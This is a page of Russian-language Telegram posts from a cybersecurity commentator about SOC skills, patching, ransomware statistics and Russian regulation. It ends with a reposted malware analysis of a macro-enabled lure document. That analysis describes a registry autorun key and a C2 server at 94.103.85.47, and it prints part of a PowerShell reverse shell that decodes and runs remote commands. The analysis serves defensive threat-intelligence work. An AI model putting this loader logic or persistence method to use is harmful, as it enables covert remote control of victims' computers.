alukatsky | Технологии

Telegram-канал alukatsky - Пост Лукацкого

26862

Уникальный контент про кибербезопасность от Алексея Лукацкого (@alukatsk) - мысли, полезные ссылки, комментарии к текущим событиям, юмор и мемасики. Канал личный - мой работодатель никак не влияет на то, что здесь публикуется. Рекламу не размещаю!!!

Подписаться на канал

Пост Лукацкого

От того же ☝️ автора есть еще и карта знаний для аналитика Threat Intelligence, коль скоро на кривой выше CTI не была учтена. По сути Юрген взял контент, требуемый для сертификации SANS GCTI и EC-Council CTIA, обобщил его и предположил, что эта карта покрывает 80% всех нужных знаний по TI, применив правило Парето 🗺

Хорошо, что автор в обоих случаях не забыл про привязку к защищаемым бизнес-процессам 🧐, ключевым системам, бизнес-рискам недопустиммым событиям, организационной структуре и т.п. темам, без которых ИБшник так и останется, пусть и технически подкованным и очень грамотным и зрелым, но технарем! 👨‍💻

Читать полностью…

Пост Лукацкого

Карты знаний и компетенций аналитиков SOC 🧑‍💻 появляются достаточно часто. И вот вам еще одна, на этот раз в форме кривой зрелости, где по оси абсцисс показаны линии SOC и "статусность" аналитиков, а по оси ординат - глубина необходимых знаний. Кривая не учитывает такие роли как Threat Hunter, Cyber Threat Intelligence Analyst, Use Case Developers, пентестеров и др., хотя и им тоже нужны описанные знания, но и многие другие. Ее автор предлагает использовать этот фреймворк для 4-х задач:
1️⃣ Обратная связь для оценки слепых зон аналитиков SOC
2️⃣ Интервью при приеме на работу
3️⃣ Планирование карьерного пути
4️⃣ Оценка возможностей по автоматизации.

Ну а за наполнением "кубиков" этой карты можно пойти на https://cybersecurity-roadmap.ru 🗺

Читать полностью…

Пост Лукацкого

Федеральной службой безопасности России 🇷🇺 возбуждено уголовное дело в отношении сотрудника одной из научных организаций по признакам преступления, предусмотренного ст. 275 УК РФ («Государственная измена»). Ранее фигурант был задержан 👮 в Москве по подозрению в совершении преступления, предусмотренного ст. 274.1 УК РФ («Неправомерное воздействие на критическую информационную инфраструктуру Российской Федерации») 😕

По версии следствия, он инициативно установил контакт с представителями украинских спецслужб. После начала СВО по их указанию задержанный проводил DDoS-атаки на критически важные объекты России 🏭 в целях нанесения ущерба информационной безопасности России. Осуществлял сбор сведений о российских военнослужащих и передвижении военной техники 💪 Кроме того, на постоянной основе переводил личные денежные средства и криптовалюту на счета зарегистрированных на Украине фондов для приобретения ВСУ вооружения, военной техники и экипировки 🤑

Задержанный дал признательные показания. Ему избрана мера пресечения в виде заключения под стражу 👮

Читать полностью…

Пост Лукацкого

В тему автоматизации работы SOCов и оценки эффективности Red/Blue Team 🧮 Часто бывает, что Blue Team, выявившая некую активность, не знает, стоит за ней Red Team или это реальные хакеры? В целом, не так уж это и важно, главное, что ее задетектили и заблокировали 🤬 Но все-таки, можно ли как-то автоматизировать тестирование защищенности с передачей команде мониторинга данных о том, что было реализовано, чтобы уже они смогли оперативно понять, что они увидели, а что нет? Иными словами, есть ли свой "Святой Грааль" у Purple Team? 🌡

Да, автоматизация добралась и сюда. Не буду говорить, чей это продукт (вы и так, наверное, догадались), но сам факт, что можно в едином интерфейсе отмечать реализованные тесты и реакцию на них достаточно интересен. И позволяет оперативнее решать вопросы с качеством детекта и реагирования. И если к такой схеме прикрутить визуализатор, то получится инструмент оценки эффективности используемых в организации защитных мер, который сразу дает ответ "кто есть ху" 🤷‍♀️

Читать полностью…

Пост Лукацкого

На DEF CON был организован сбор пожертвований на предвыборную кампанию Камалы Харрис, кандидата в президенты США от демократов 🇺🇸 Эта акция продемонстрировала политическую активность и некоторый перекос в симпатиях хакерского сообщества, а также важность кибербезопасности в политических кампаниях. Да, пожертвовали 🤑 от 250 до 10000 долларов всего 150 человек из общего числа, но все равно это самая крупная сумма за 31-летнюю историю хакерской конференции (за Клинтон в 2016-м и за Байдера в 2020-м там же было собрано вместе не более 100 тысяч долларов) 🎊

Интересно, что Кремниевая долина и криптоиндустрия (не путать с индустрией средств шифрования), наоборот, отдают предпочтение Трампу 🐘; особенно после недавнего выступления последнего на крупнейшей конференции по биткойну и смены своего отношения к криптовалютам 💸

Камала Харрис, как вице-президент, сосредоточилась на вопросах кибербезопасности и технологической политики и, если ей повезет, в новой роли она продолжит эту тему, будут очень хорошо подкованной в данных темах. В прошлом она активно поддерживала инициативы по защите критической инфраструктуры 🏭 от кибератак, а также выступала за усиление кибербезопасности в выборных процессах 🗳

Харрис уделяла внимание вопросам конфиденциальности данных и защиты потребителей в цифровую эпоху (она как раз была генеральным прокурором Калифорнии, когда штат принимал законодательство в этой области), выступая и за регулирование безопасного и доверенного ИИ 🧠 (именно она возглавляла делегацию США прошлой осенью, когда в Европе подписывали меморандум по данной теме). В отличие от Трампа, который больше обвинял китайцев в кибератаке, Харрис больше говорит о "русской киберугрозе". Эти темы остаются ключевыми в ее политической повестке и могут стать центральными в ее потенциальной президентской кампании.

ЗЫ. Не знаю, насколько вам интересно то, что происходит в США, но тот, кто возглавит эту страну в январе, имеет определенное влияние на то, что происходит в мире технологий и ИБ на всей планете.

Читать полностью…

Пост Лукацкого

У меня часто происходят заочные дискуссии с Александром Леоновым - он комментирует мои посты, а я его (забавно, что такие дискуссии в онлайне проходят чаще, чем мы с ним видимся в офисе, хотя и работаем в одной компании). Так вот Александр, комментируя одну из моих заметок, пишет, что патчить надо все 🔄. Я продолжаю придерживаться иной позиции, которая очень хорошо описана в стандарте ISA/IEC TR 62443-2-3 – 4.1:

Применение патчей - это решение из области управления рисками. Если цена применения патча больше чем, цена оценённого риска, тогда патч может быть придержан; особенно если используются иные защитные меры, которые могут нейтрализовать риск.


В другом стандарте, TSA Security Directive Pipeline-2021-02D, говорится о том, что все патчи и обновления должны соотноситься с каталогом CISA KEV, то есть трендовыми уязвимостями. А уж в отношении этого, небольшого числа патчей, можно уже и соответствующий процесс выстраивать, ориентируясь, например, на NIST-800-82-r3 и IEC TR 62443-2-3, в котором предлагается следующее:
проведите инвентаризацию всех активов, которые могут потребовать установки патча 🧮
задокументируйте все используемые версии ПО и прошивок (управление активами очень важно)
убедитесь, что поставщик обновлений имеет процедуру для их тестирования
документируйте процесс установки патчей ✍️
вовлекайте экспертов по обновляемым системам и процессам, в которых эти патчи должны быть установлены
в первую очередь ставьте патчи для ДМЗ и трендовых уязвимостей
примите во внимание требования к доступности/непрерывности функционирования систем при установке патчей
сначала протестируйте патчи в контролируемой тестовой среде 💻
запланируйте установки патчей в технологические окна поддержки и имейте при этом "план Б" (вдруг все накроется как с CrowdStrike)
продумайте компенсирующие меры при применении патчей (там, где необходимо)
сохраняйте ежеквартально лог всех установленных обновлений и патчей
упомянутые выше стандарты не упоминают "канареечный деплой", но я бы про него тоже подумал. Это когда патч накатывается не сразу на все узлы, а на небольшую группу
вместо патчей иногда лучше использовать меры защиты, нейтрализующие использование уязвимостей, для которых разработан патч.

Читать полностью…

Пост Лукацкого

🛍 Интересные цифры: 74% компаний, подвергшихся атакам шифровальщиков с целью получения выкупа за последние 12 месяцев, были атакованы несколько раз, причем многие - в течение одной недели! 😮

Так что расслабляться после атаки не стоит - она может повториться и второй, и третий раз


78% атакованных организаций заплатили выкуп 🤑, а 72% заплатили его несколько раз. При этом 33% заплатили выкуп четыре и более раз 😲

Это, конечно, не 4 раза по 75 миллионов, но все равно суммы значимые 💰


87% атак привело к сбоям в работе бизнеса, даже у тех, кто заплатил выкуп, - включая потерю данных и необходимость отключения систем. Для 16% компаний атака поставила перед дилеммой "жизнь или смерть".

То есть для каждой 6-й компании атака шифровальщика стала, по сути, недопустимым событием 💥


49% жертв потребовалось от 1 до 7 дней для восстановления бизнес-операций до минимальной функциональности ИТ, а 12% - 7 дней и более

Это если вас, вдруг, спросят, во сколько вам обойдется стоимость атаки, а вы решите посчитать не только затраты на восстановление и выкуп, но и упущенную выгоду и стоимость простоя 📈

Читать полностью…

Пост Лукацкого

Выступил вчера на ИТ-Пикнике с рассказом про безопасность Интернета вещей и устройств, которые нас окружают сейчас и которых будет еще больше в ближайшее время. Шлёпки, велосипеды 🚲, дезодоранты, зубные щетки, вибраторы, вилки, аквариумы 🪸, кардиостимуляторы, пылесосы и многие другие устройства, которые сегодня небезопасны и необдуманно используются людьми, неподозревающими, что они представляют из себя угрозу для них самих, для их близких и окружающих 🔓

Презентацию 📄 прилагаю (когда появится видео, тоже поделюсь). Организаторам респект за все! 🤝

Читать полностью…

Пост Лукацкого

Вы же помните, что 12-го сентября будет не только 29 лет термину "хакатон", но и вступят в силу очередные санкции США, согласно которым будет запрещено ⛔️ оказывать ИТ-услуги всем российским организациям? 🇺🇸 Я когда в июле рефлексировал на последнюю тему, то сделал два предположения:
1️⃣ Возможно расширительное толкование термина enterprise management software.
2️⃣ Возможно будут использовать блокировки по GeoIP 🤬

И вот вам яркий пример реализации обоих предположений. Известный многим сервис Miro, разработанный россиянами, с 12 сентября перестанет оказывать услуги в России, а в качестве определения "русскости" используются IP-адреса, с которых осуществлялся доступ к Miro в последние месяцы 🧑‍💻

Ну а дальше, как говорится в Евангелии от Луки (8:8): "Имеющий уши, да услышит!" С учетом новой информации стоит еще раз пересмотреть список ПО, происходящего из США, которое используется в деятельности служб ИБ. Чтобы 13 сентября (в США еще будет 12-е) у вас не началось со звонков "Мля, у нас ничего не работает" 🤓

Читать полностью…

Пост Лукацкого

Тут МТС в свой сервис "Защитник" добавил новую возможность - контроль утечек информации. Ну я и решил его попробовать. Сразу скажу, что впечатления неоднозначные и вот почему:
1️⃣ При подключении услуги и в течение нескольких дней после этого сервис у меня никаких утечек не обнаруживал. Предположу, что МТС просто обращается к внешнему сервису по API запросу и делает это не в онлайне (на самом деле я даже знаю, куда он обращается). Там бы четче написать, как работает сервис, а то я совершенно случайно зашел в приложение спустя пару недель и нашел там список утечек.
2️⃣ Когда сервис пишет, что произошла утечка из некоего банка, рекомендует сменить карту, но не говорит, что за банк, то это выглядит странновато. Из всех дальнейших утечек именно эта меня очень заинтересовала, но по ней нет вообще никаких деталей, чтобы предпринять какие-то действия. Интересно, что я не слышал про утечки из банков, которыми пользуюсь.
3️⃣ Утечка с портала Госуслуг?.. Все отрицают, что такая утечка имела место быть.
4️⃣ Утечка из ЕСИА? По ней совет, конечно, понятный, но я не знаю никого, кто бы пошел менять паспорт из-за утечки его персональных данных.
5️⃣ Последняя "утечка" интересна. Я никогда не регистрировался в интим-магазине, ни в российском, ни в зарубежных (несмотря про регулярные рассказы о взломах сексуальных игрушек). Кто-то явно хотел подшутить надо мной, указав мои персональные данные; тем более, что номер моего телефона узнать не так-то и сложно.
6️⃣ В списке преимущественно российские утечки, но даже они далеко не все. Я знаю, что по мне есть точно утечка в базе авиаперелетов, но в услуге от МТС ее нет. Из иностранных там затесался clubhouse, но вот куча остальных сервисов, которые показываются другими сервисами, там отсутствует.
7️⃣ Некоторые утечки вообще непонятны, что они из себя представляют. Например, "Пропуска". Что это? Откуда? Какие пропуска? Почему там мои паспортные данные?

В целом, впечатление неоднозначное. Недоработана услуга еще для эффективного использования. Но как еще один сервис в копилку, почему бы и нет. Все равно бесплатно (для МТС Premium). Если сложить выдаваемые им утечки с иностранными, то получится вполне себе набор.

Читать полностью…

Пост Лукацкого

Лукацкий или Агутин? Наверное, каждый, кто пойдет завтра (в субботу) на ИТ-Пикник Т-Банка задается таким вопросом 🤔 Но не надо гадать, идите на мое выступление "От стелек и кардиостимуляторов до умных пылесосов и колонок. Что делать с их небезопасностью?", а уже потом можно пойти послушать "босоногого мальчика" 🎤

Мое выступление будет в 18.00 в лектории "Кибербезопасность" 🛡 Передо мной будут с 13-ти часов выступать Евгений Волошин, Александра Котельникова, Сергей Голованов, Андрей Костин с докладами про OSINT, биометрию, ландшафт угроз, космические системы, а также дискуссия (Дмитрий Гадарь, Алексей Усанов, Александр Каледа, Дмитрий Евдокимов и Александо Ершов) и киберквиз от Кибердома 🤔

ЗЫ. У 🟥 также будет свой стенд, где будем много всяких активностей. Увидимся на ИТ-Пикнике 🤝

Читать полностью…

Пост Лукацкого

А вот тут ребятки из MIT взяли с полсотни существующих таксономий рисков и угроз, связанных с искусственным интеллектом, проанализировали их и разработали базу данных AI Risk Repository, содержащий свыше 700 ИИ-рисков. База данных сделана на базе Google Sheet и может быть переиспользована для своих нужд 🧠

Читать полностью…

Пост Лукацкого

22 августа в 14.00 (мск) открою новый сезон позитивных вебинаров разговором о методах оценки эффективности аналитиков, процессов и инструментов, применяемых в SOC 📈. На трансляции вы узнаете:
1️⃣ Зачем и как измерять эффективность ИБ в целом и SOC в частности?
2️⃣ Какие показатели использовать для мониторинга, реагирования, threat intelligence, threat hunting и других процессов?
3️⃣ Можно ли уйти от измерения числа инцидентов, среднего времени реагирования и заменить их бизнес-ориентированными показателями?
4️⃣ Стоимость учетной записи в даркнет, количество негативных упоминаний в СМИ, предотвращенных недопустимых событий и другие примеры кумулятивных метрик для SOC?
5️⃣ Лайфхаки для оценки эффективности.

Вы получите ключевые метрики для оценки разных аспектов работы SOC, а в качестве бонуса — примеры из практики, которые помогут вам внедрить эти метрики в своей компании. Присоединяйтесь! 🤝

Читать полностью…

Пост Лукацкого

Тут австралийцы задались вопросом кибербезопасности дронов 🛸 и выпустили небольшой отчетик о том, какую роль БПЛА играют в ИБ, какие угрозы ИБ они несут, и как вообще эта тема регулируется в мире. Не то, чтобы открытие и вау, но как первый подход к снаряду вполне себе. Для начала разговора вполне подойдет 🛸

Читать полностью…

Пост Лукацкого

Мда, маркетологам в забугорщине непросто приходится. Что не креатив, то потом извиняйся перед геями, лесбиянками, небинарными личностями, женщинами, афроамериканцами и афроафриканцами, коренными жителями США, католиками и протестантами, иудеями и православными... 🌈

Вот Palo Alto на DEFCON решило сделать живые торшеры, в качестве моделей для которых взяли молодых девушек 👩🏼 Еще 3-4 года назад ни у кого и мысли бы не возникло возмущаться - на выставках с преимущественно мужским контингентом полуголые грации, бодиарт, гимнастки под потолком... были в порядке вещей на всех материках, кроме, пожалуй Антарктиды 🌏 А вот тут случился облом, да такой, что генеральному директору ИБ-вендора пришлось публично извиниться перед всеми, кого обидела эта инсталляция. Или перформанс? Я все время их путаю.

А дальше ведь еще хуже будет. Точнее не креативно и скучно. Все будут бояться сделать что-то не то, что-то, что может обидеть или "тех", или "этих". А значит все будут серые и одинаковые, скучные и безликие... То ли дело у нас 😎 Правда, у нас другие проблемы.

Читать полностью…

Пост Лукацкого

Ну всё, всем кранты 😱 Анонимные арабы (так группировка называется, если что) выходят на тропу войны под девизом «За Курск! За Россию! За Белгород! За Донбасс» 🏹

ЗЫ. «Марроканские драконы» 🐉 тоже в деле - на днях 12 камер взломали в украинских офисах и складах. Под тем же девизом 💪

Читать полностью…

Пост Лукацкого

Обратили внимание, в предпоследней заметке эффективность МСЭ не самая высокая 🤬 в части блокирования, что вызывает некоторые вопросы? Да, то, что на оконечном устройстве эффективность работы EDR/RPP выше, это понятно, - все-таки они видят конечную цель хакеров и могут ее точнее идентифицировать 🎯 Но что не так с МСЭ? Он не видит современные атаки? Он не способен анализировать зашифрованный трафик? Может быть всякое, в том числе и проблема с настройкой средства сетевой безопасности в конкретной организации 😞

А вот на кривой "эффективность-цена", которую разработал Mads Bundgaard Nielsen, те же межсетевые экраны находятся в самой выгодной позиции - почти минимальная стоимость и максимальная эффект 📈 от внедрения с точки зрения ИБ. Как по мне, так достаточно спорная кривая, так как все будет зависеть от кучи факторов. Считать IAM-решения - самыми-самыми эффективными в ИБ я бы не стал, если автор в них, конечно, не зашивал историю с ITDR (Identity Threat Detection & Response). Не очень понятно, чем APT Defense отличается от Advanced Threat Detection, почему IDS более эффективны чем фильтрация e-mail и т.п. Но как еще один способ приоритизации инвестиций в ИБ, почему бы и нет. Как повод поразмышлять, так уж точно 🤔

Читать полностью…

Пост Лукацкого

Ну а вот так уже выглядит история с оценкой эффективности мер обнаружения и реагирования от квартала к кварталу 📈 Ее, конечно, можно попробовать засунуть в один показатель, который и выносить на дашборд, но для тактического анализа это будет не очень правильно. За одной цифрой будет сложно понять, что хорошо и что плохо, что можно улучшить 🌡

Например, мы видим, что в части тактики первичного доступа ситуация стала и лучше и хуже. Компания стала больше блокировать (синяя закраска) на этом этапе, но при этом и пропускаются аттачи PDF с ссылками на Google Drive (красная закраска) 📄 С точки зрения EDR, они стали меньше блокировать атак, только детектируя ряд новых техник. Ну и т.д.

Конечно, в реальности такие графики 📈 должны оцениваться динамично и гораздо чаще, чем раз в квартал. При тех показателях TTA (time to attack) иначе и нельзя. Но при наличии автоматизации в этом вопросе это решается достаточно быстро.

Читать полностью…

Пост Лукацкого

Если SOC занимается только мониторингом на базе SIEM, то это больной SOC. Так было сказано еще в 2017-м году. Интересно, что услуга реагирования в таком SOC тоже присутствует, но в виде привлечения внешних компаний (IR Retainer). И кажется мне, что таких SOCов, несмотря на прошедших 7 лет, все еще большинство 😱

Читать полностью…

Пост Лукацкого

Помните фильм 🎬 "Человек, который изменил все" (Moneyball в оригинале) с Бредом Питтом? Там главный герой, возглавивший бейсбольную команду, сделал ставку не на суперзвезд, а на посредственных игроков, которые были сильны именно в команде (там как раз показана сила data science, когда анализ сотен параметров по каждому игроку позволяет составить действительно победоносную команду, выигравшую 21 игру подряд) ⚾️

Вот в ИБ, где постоянно говорят о нехватке кадров, схожая со многими видами спорта история, - клубы и команды пытаются заполучить звезд ⭐️, которые в одиночку, как правило, мало что могут. А так как звезд на всех не хватает, то открытые позиции ИБшников не закрываются, в среднем, по 6 и более месяцев. Из других интересных цифры, которые должны заставить задуматься тех, кто отвечает за найм специалистов по кибербезу и размещение вакансий на сайтах поиска работы:
1️⃣ 72% специалистов по рекрутингу считают, что их описания ИБ-вакансий идеальны, в то время как только 36% соискателей согласны с этой точкой зрения
2️⃣ Неудачный найм и несоответствие ожиданий роли обходится в 5 раз дороже зарплаты кандидата.
3️⃣ Производительность труда возрастает на 25%, а 75% сотрудников отмечают более высокую удовлетворенность работой, когда роли, на которые их берут, понятны и хорошо описаны ✍️
4️⃣ 92% специалистов говорят, что их компании страдают от нехватки компетенций в одной или более областей
5️⃣ 33% лидеров говорят о нехватке тренингов для ИТ-специалистов по вопросам ИБ
6️⃣ Работники с 75%-й вероятностью останутся с компанией надолго, если у них есть возможность горизонтального развития/перемещения
7️⃣ 3 из 5 факторов, которые ИБшники учитывают при поиске новой работы, отражают желание освоить новые навыки 🧑‍💻

Дайте кандидатам то, о чем они мечтают, и у вас будет команда мечты!

Читать полностью…

Пост Лукацкого

Когда больше половины экспертов дадут более чем 50%-ю оценку взлома RSA-2048 менее 24 часов с помощью квантового ⚛️ компьютера, вот тогда можно реально будет напрягаться. Судя по оценкам 2023-го года - это произойдет после 2034-2035 годов (при текущем уровне развития технологий), не раньше Что, правда, не отменяет внезапных открытий или секретных разработок.

Но... важно помнить, что какой бы срок не предсказывали эксперты, уже сейчас многие государства, Китай 🇨🇳 так уж точно, накапливает все зашифрованные данные, до которых он может дотянуться. И когда появятся работающие квантовые компьютеры 💻, тогда все эти сохраненные данные будут щелкаться как орешки 🌰 И в данной теме, вопрос стоит уже не можно или нельзя дешифровать данные, а когда это произойдет?! Но для ИБшников в этом ничего нового - точно так же вопрос стоит в отношении инцидентов ИБ - не "случится он или нет", а "готовы ли мы, когда он случится".

Читать полностью…

Пост Лукацкого

🎙 Подкасты на тему информационной безопасности.

• ИБ-подкасты помогут Вам прокачать профессиональные навыки, узнать последние новости, сориентироваться в индустрии и получить много новых знаний в данной сфере.

Hack me, если сможешь — подкаст о современных киберугрозах и защите от них, созданный при поддержке Positive Hack Days — одноименного ИБ-форума.

Смени пароль! — разговорное шоу от экспертов «Лаборатории Касперского» о расследовании киберпреступлений и актуальных угрозах кибербезопасности.

Security Stream Podcast — новости и тенденции кибербезопасности, интервью с известными ИБ-экспертами, обсуждение взломов и методов защиты бизнеса.

Security Vision — подкаст компании «Интеллектуальная безопасность». Обзоры различных средств информационной безопасности и публикаций MITRE.

Информационная безопасность — проект одноименного журнала и сайта ITSec.ru. Представляет собой аудиоверсии избранных статей, зачитанные роботом.

OSINT mindset — свежий подкаст о разведке на основе открытых источников данных, ориентированный на обсуждение методов, инструментов и философии этой дисциплины.

Кверти — шоу студии Red Barn, в котором обсуждают ИБ и в доступной форме объясняют, как противостоять интернет-мошенникам.

Схема — подкаст Т-Ж в котором разоблачитель мошенников с 15-летним стажем погружается в реальные истории обманутых героев и препарирует схемы аферистов.

F.A.C.C.T. — волнующие расследования, захватывающие истории о хакерах и практические советы экспертов по цифровой гигиене.

#Подкаст #ИБ

Читать полностью…

Пост Лукацкого

Почему авторы новых шифровальщиков 🤒 все чаще самостоятельно пишут криптографическую подсистему и особенно подчеркивают это при рекламе своих изделий? И почему они, если верить, что многие из России 🇷🇺, не используют отечественные криптографические алгоритмы? Почему такой непатриотизм?

Я тут услышал версию, что это однозначно выдает в авторах шифровальщиков сотрудников ФСБ 🇷🇺, которые законопослушны и не могут применять отечественный ГОСТ, не сертифицировав конечное изделие в 8-м Центре. А я возразил, что если бы это были сотрудники ФСБ, то они бы точно не стали использовать американский стандарт шифрования 🔐, да еще и вывозить готовое СКЗИ из страны, не получив на это экспортную лицензию. Да и вообще, по мнению ФСБ все, что не использует отечественные криптографические алгоритмы, не считается у нас СКЗИ и вообще спецслужбе не интересно 🤷‍♀️

ЗЫ. Все написанное выше - шутка 😂 Кроме реальных скриншотов рекламы шифровальщиков!

Читать полностью…

Пост Лукацкого

В 18.00 доклад 18+ в лектории «Кибербезопасность» в 18х18 м от стенда Позитива в направлении зюйд-зюйд-вест!

Читать полностью…

Пост Лукацкого

Я тут вчитался в текст закона про блогеров-десятитысячников (303-ФЗ) и понял, что тупость пишущих законы прогрессирует, а мем про Интернет на дискетке скоро станет реальностью 🤦‍♂️ Ведь что пишут депутаты, если перевести это на нормальный русский язык, - вы не можете репостить ничего от блогеров-десятитысячников, что не внесено в реестр Роскомпозора. То есть проблема закона не в том, что невнесенные в реестр не могут размещать рекламу и получать донаты, а в том, что круг тех, кого можно репостить и на кого ссылаться, ограничен очень небольшим числом тех, кто попал в реестр 🆒

Вот захочу я, например, репостнуть про окончание 18-го августа приема заявок на стажировки в Positive Technologies и смогу это сделать только если корпоративный канал 🟥 будет внесен в реестр РКН. А вот мемасики от POSIdev могу репостить без ограничений. А все потому, что в одном канале больше 10 тысяч пользователей, а в другом - меньше 🤓

Как репостить из зарубежных соцсетей, включая и Telegram? А вот это самое интересное. По мнению одного из авторов закона, депутата Хинштейна, который никак с женой не разберется, которая в запрещенный в России Instagram до сих пор постит, совершенно неважно, кем и где написан текст. Важно, что он доступен из России, а значит на него распространяется новый закон. А значит репостить материалы ЛЮБОЙ зарубежной соцсети будет нельзя 🤠 Кто не зарегается в РКН, того страницу заблокируют. Если соцсеть откажется блокировать страницу и ее автора, ее заблокируют саму 👮

российские законы
не трудись понять
дважды два четыре
но немножко пять

ЗЫ. Может канал начать дробить, как г-жа Блиновская свои доходы? Завести каналы по 9999 пользователей и ограничить верхнюю планку подписчиков? 🤬 Но репостить все равно будет нельзя.

Читать полностью…

Пост Лукацкого

Пару-тройку лет назад около 20% иностранных сайтов блокировали доступ с российских IP-адресов 🤬 (думаю, что сейчас число таких ресурсов еще больше), что требовало поиска методов решения этой задачи. И не так чтобы их было много. Прокси, VPN, режим инкогнито (с оговорками).

Я эту проблему для себя решил, но гарантий, что мой вариант продержится еще долго, нет. Поэтому я держу руку на пульсе и слежу за новыми VPN, которые появляются в Интернете. И вот мне попался свежий сервис сравнения нескольких десятков VPN по 40 различным критериям. Так что если вам нужен доступ к обучающим и новостным ресурсам по ИБ, то есть из чего выбрать. Правда, не со всеми проставленными оценками я согласен. Например, когда написано, что логи не ведутся 😂

Но в остальном, вполне себе. И пусть никакая иностранная зараза не заблокирует нам доступ к своим ресурсам 💪

‼️ Применять данные средства для обхода российских блокировок ни в коем случае нельзя ‼️

Читать полностью…

Пост Лукацкого

Число враждебных ИИ/LLM растет с каждым днем 🤖 - какие-то из них узкофункциональные, какие-то широкого применения, какие-то фейковые (и выманивают деньги у других киберпреступников), какие-то вполне рабочие 🤖 Вот тут очень неплохое исследование различных враждебных ИИ-моделей 🧠

Читать полностью…

Пост Лукацкого

Надеюсь, никого не оскорбляет? И пропагандой не является? И демонстрацией способов обхода?

Читать полностью…

Пост Лукацкого

Совет по международным отношениям опубликовал статью, в которой обсуждается усиливающаяся цифровая изоляция России 🇷🇺 и ее растущую зависимость от Китая 🇨🇳 Автор пишет, что после вторжения в Украину в 2022 году Россия все больше отрезана от западных технологий и компаний, что привело к активизации сотрудничества с Китаем в сфере технологий. Это создает новые уязвимости для России, особенно в области кибербезопасности и шпионажа против нее 👲

Также автор призывает США 🇺🇸 и их партнеров использовать разведданные из открытых источников, чтобы выявлять спрос России на китайские технологии. Эти данные можно получать из различных источников, включая российские конференции по кибербезопасности (где автор слышала, чтобы у нас про китайцев на ИБ-тусовках говорили?) и публичные контракты. Это поможет обнаружить уязвимые места, такие как зависимость от китайских полупроводников и смартфонов 🧑‍💻

Кроме того, предлагается американской разведке 🇺🇸 провести анализ технологий, таких как Astra Linux, используемых в российских военных системах, что может выявить потенциальные слабые места, которые США и их союзники могут использовать для получения преимуществ в киберпространстве.

Читать полностью…

Пост Лукацкого

!!р^д**н**c 🤔

Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.

Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.

Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта.

Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM<part1>CHECKSUM<part2>, которые декодируются и записываются в файлы:

<part1> -> %USERPROFILE%\\UserCache.ini.hta
<part2> -> %USERPROFILE%\\UserCache.ini

UserCache.ini.hta прописывается макросом в автозапуск Windows Explorer через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD. Назначение данного файла — запустить исполнение файла UserCache.ini.

UserCache.ini представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47 (Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>.

Команды передаются в формате XML и содержат несколько атрибутов:

CountRuns — сколько раз нужно выполнить команду;
Interval — интервал ожидания в минутах между последовательными выполнениями одной команды;
Module — закодированная в Base64 команда.


...
try {
$Commands = [xml]$Configs;
$cycle_num = 0;

while($true){
$num_commands_completely_executed = 0;
$num_commands_executed = 0;
foreach ($CommandConfig in $Commands.Configs.Config)
{
$num_commands_executed += 1;
$quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval);
$rem = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval);

if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){
$command_expr = FromBase64 $CommandConfig.Module;
try{
Invoke-Expression($command_expr);
}
catch {}
}

if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){
$num_commands_completely_executed += 1;
}
}

Start-Sleep 60;
if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){
break;
}
$cycle_num += 1;
}
}
catch {}
...


Для блокировки автоматического выполнения макросов можно воспользоваться руководством от Microsoft.

IoCs:


Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b



UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9



UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7



94.103.85.47


#malware #news #detect #ti
@ptescalator

Читать полностью…
Подписаться на канал